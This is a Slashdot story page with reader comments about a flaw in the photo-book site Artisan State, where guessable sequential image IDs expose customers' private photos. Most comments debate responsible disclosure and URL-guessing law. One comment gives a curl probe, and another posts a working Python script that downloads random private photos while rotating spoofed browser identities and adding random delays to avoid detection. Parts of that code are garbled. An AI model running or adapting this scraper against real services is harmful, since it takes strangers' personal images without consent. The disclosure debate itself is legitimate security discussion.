Slashdot Mirror
Photo Printing Website Artisan State Allows Access To All User-Uploaded Photos
fulldecent writes: Popular photo printing website Artisan State, which specializes in bound photo books mostly for weddings or other events, unintentionally makes all its uploaded user photos available publicly for download. This case study shows how their photos are able to be downloaded and discusses the things vendors should think about when considering security of seemingly private user content. The case study also discusses how this flaw was reported to the vendor, but unfortunately never fixed. This follows other articles on Slashdot discussing security disclosure. How do you report vulnerabilities to vendors? Do you support publishing them if they are not fixed in a reasonable time?
Be careful when using this vulnerability......depending on your purpose in using it, you could be literally committing a crime. If you download the images by modifying the URL.......people have gone to jail for that.
"First they came for the slanderers and i said nothing."
I was preparing a book for one of my clients and as I am uploading the photos, which are personal, the first thought was... should I really be uploading these photos to this website, we just met?
The answer is no, of course you shouldn't trust any website. If you want it to remain private, leave it off the internet.
"First they came for the slanderers and i said nothing."
Full disclosure may well be a necessary evil -- sure, it allows anyone for some period of time to exploit the vulnerability; but it sure ends up getting fixed. Companies will wait months and years to fix security bugs if there is no clear and present danger.
Any time I disclose a bug to a vendor, I now tell them in the e-mail they have five days to fix it; after that it will be publicly disclosed. And I always make good on the disclosure.
... plenty of lead time and followup.
These issues need to be publicized when the hosting site doesn't give a fuck. Customers have a right to know.
It little behooves the best of us to comment on the rest of us.
You know there's pictures of penises in there, anyone can get to them. 'Nuff said, right? Wasn't chat roulette working on some penis detection code? Perhaps someone could hook that code up to an automated web robot to automatically ferret the dick pics out of this site.
I'm trying to teach myself to set people on fire with my mind... Is it hot in here?
If you see a car unlocked you tell the owner, but you don't tell everyone. If you see a flaw in the design of the door which means all of the cars will be unlocked you don't have any way to tell the owners without telling everyone.
Small quantities, by hand, using traditional methods - it's the last part that has become the fashion, where any developments that have happened are ignored in favour of doing it how it was done a century ago.
You should ask them why they aren't fighting in the Great War.
After being arrested, tortured and killed for trying to alert an on-line service to their vulnerability due to poor design, I no long try to contact vendors directly. I now publish the information in great detail to pirate sites, and I have found that this will get the attention of the company much better than trying to alert them quietly.
I'm an American. I love this country and the freedoms that we used to have.
If you are not logged in as me then you have no business accessing that photo. But alas... you can. There is nothing special about that URL, in fact you can access every photo this way. The following command confirms that you have access to a random photo without actually downloading it.
ID=$(php -r 'echo mt_rand(0,8000000);')
URL="http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=$URL"
curl --head $URL --silent | grep Length
It is not hard to figure out how to edit this command to download all photos. Please don't. Based on how many photos are on Artisan State and the fact that they use Amazon S3, it will cost them about $80 each time you run the edited command.
Really? REALLY? That's like crack for trolls.
Your hipster district is obviously different than mine. I have literally never seen the word artisanal other than in your post. I see the word artisan all the time, but I believe in 100% of cases, it is used incorrectly. According to the dictionary it means "using a trained artistic skill". I have seen minimum wage workers slapping sandwiches together called "sandwich artisans". Nope. Slapping sandwiches together in a poor fashion and forgetting half the ingredients is not artisanship.
If you are not allowed to question your government then the government has answered your question.
In an ideal world you'd notify the vendor, the problem would get fixed and the world would move on. Alas, we don't live in ideal world. Vendors fail to fix problems. Users don't upgrade software, or can't upgrade it or are unaware they're even using it, and the vendor doesn't publicly announce the fix and the need to apply it. The threat of disclosure, and the eventual disclosure even if the vendor doesn't say anything, is the only leverage we have to make sure vendors really do fix problems and users know what they need to know to assess the risks and mitigate the problem if they can't apply the fix. I'd love not to need to use that leverage, but we've seen how well that works already and we see repeated examples showing that vendors haven't changed their ways. Realistically the best we can manage is to notify the vendor (with full details, so they can verify the flaw is real and can't believably claim they couldn't replicate it) and give a deadline for either fixing the problem or providing mitigation measures, and then follow through with complete disclosure (so others can verify the problem's real without having to take our word for it) if the deadline passes without the vendor having disclosed the details themselves.
Unfortunately too many vendors have made it unsafe to do even that much. They don't just ignore problem reports and deny the problem exists, they actively try to silence the person reporting it through lawsuits and criminal prosecution and smear campaigns. When dealing with vendors like that you can't safely notify the vendor of a problem. I don't like it, but when dealing with a vendor like that all you can do is dump all the details into one or more suitable disclosure forums and make sure you've covered your tracks thoroughly so the vendor can't trace the disclosure back to you. Then clam up on the subject and don't say a single word anywhere to give anyone the idea that you were at all involved, lest you give the vendor a reason to suspect you. It's not a polite, civilized way of dealing with the matter, but I figure if the vendor's made it's bed it's just going to have to lay in it.
A fact:
The whole point of the WWW is that if you have the url, you can get the content.
There are many useful cases where guessing the url is the right thing to do.
Given this, there are two ways that laws can go.
A) Using any URL that you were not given may be illegal.
B) Using any URL you want is ok.
Plan A eliminates many useful access methods, removes any pesky responsibility from the web site developer, and gives the bad guy (and lawyers) a great operating environment. It penalizes the good guy and optimizes the web for the bad guy.
Plan B requires the web site developer to have a clue about security. This is not rocket science, a big RN in each url should suffice. The problem is that this plan provides a legal shield for all sorts of nefarious activities.
So what is the right compromise?
Consider the following story.
You go to a gym and the owner gives you a combination 223 for locker 100. You switch lockers and he gives you combination 333 for locker 210. You blink twice and know the combination is the locker number plus 123. The owner has basically taught you the open secret for all the combinations for all lockers. Now clearly you shouldn't steal from another locker regardless of it is locked or not. The question is should you have an extra responsibility because it is locked, even in a lame manner. Did the owner have a responsibility to use a non-lame combination scheme? Is there a threshold for lame versus non-lame?
The story is particularly interesting on the www where having a url gives you access to the content. There is a mix of content that the owner likes anybody to see, and content where the owner would like access to be restricted. If the content owner (like the gym owner) basically publishes the url, then would not a reasonable person assume that the owner would like anybody to get it?
Well maybe yes and maybe no. Some sites have a terms of use which a person with a random url might not see. Given this, should there be a responsibility of the content owner to use a non-lame url for content he wishes to restrict access to?
I think a useful compromise is that if you can easily guess the url, with good odds on the first try, it is definitely fair game.
In the photo printing example, if the web site wanted restricted access, they would have used something more than a sequential picture number.
Given that they did not, a reasonable person, would assume that they wanted unrestricted access.
The 'good odds on the first try' test works well to separate password hackers from trying to easily search another city on Craigslist.
This gives us a blend of plans A and B and defines the duty of both the web site developer and user in a useful way.
Note that current law is pretty crazy in this area. Folks are in jail for using url's that had great odds on the first try and no other nefarious activity. Just because it sounds reasonable does not mean that one would be wise to use it without pause.
My favorite is when people mispronounce / misspell artisan as artesian.
I always ask them what those pastries/bread/haircuts/etc. have to do with natural water wells :-)
Looks like it has been fixed. Or at least you have to login to see anything.
https://www.schneier.com/essay... Well worth the read if you haven't before.
I remember sigs. Oh, a simpler time!
Third last paragraph gave me a laugh.
Well yeah I guess the average reddit user does have certain distinguishing traits.
It's the pressure man!
My pet hate now is I live in a suburb on a bend on a river and a pile of trendy people are calling it a "village" on a "peninsula".
First time a vulnerability was disclosed on Slashdot?
So you have a poor vocabulary. Try watching something other than Fox news.
Of course it's possible you live in a place full of fuckwits and they just use the noun as an adjective. Artisan sandwich? Are they cannibals round here?
Confucius say, "Find worm in apple - bad. Find half a worm - worse."
http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=21022809
import requests
import random
import os
import sys
import time
sys.stdout = os.fdopen(sys.stdout.fileno(), 'w', 0)
tmp_pth = 'C:\\temp'
os.chdir(tmp_pth)
headers = {
"Content-Type": "application/x-www-form-urlencoded",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"User-Agent": "Mozilla/"+str(round(random.random() * 5, 1))+" (Windows NT 6; WOW32; rv:38.0) Gecko/20100101 Firefox/"+str(round(random.random() * 37, 1)),
"DNT": "1"
}
agents = [ .NET CLR 2.0.50727; InfoPath.2)", .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)", .NET CLR 2.0.50727; InfoPath.2)Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)",
"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1;
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1;
"Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)",
]
for i in range(200):
ID = str(int(random.random() * 8000000))
headers["User-Agent"] = agents[int(random.random() * 10)]
r = requests.get(
'http://upload.artisanstate.com/upload/UploadServer/GetRenderImage?imageID=' + ID,
headers=headers)
fh = open(ID+'.jpg', 'wb')
fh.write(r.content)
fh.close()
print 'wrote', i, tmp_pth+'\\'+ID+'.jpg'
time.sleep(random.random()/10.)